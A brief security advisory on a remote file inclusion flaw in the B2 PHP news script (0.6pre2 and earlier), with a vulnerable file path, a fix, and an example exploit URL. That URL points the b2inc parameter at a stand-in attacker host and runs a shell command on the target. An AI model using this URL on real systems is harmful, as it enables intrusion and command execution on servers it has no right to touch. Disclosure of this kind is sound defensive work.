B2 PHP Remote Command Execution

 
 Summary 
B2 is a php script that allows webmasters to quikly post news on the front page and let viewers interacts with each other. A bug exists in the script that allows an attacker to remotely execute commands.

 
 Details 
Vulnerable systems:
 * B2 version 0.6pre2 and earlier

Vulnerable code:
Taken from /b2-include/b2edit.showposts.php

*snippet*



(NOTE: The attacker's server must not be able to run PHP, it has to open the file as text)

He can include the file like this :
http://host/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls

This would execute the ls command on "host".

Temporary fix:
Copy b2config.php into the b2-include directory 
 

    Source: geocities.com/ijookeren/xxx

               ( geocities.com/ijookeren)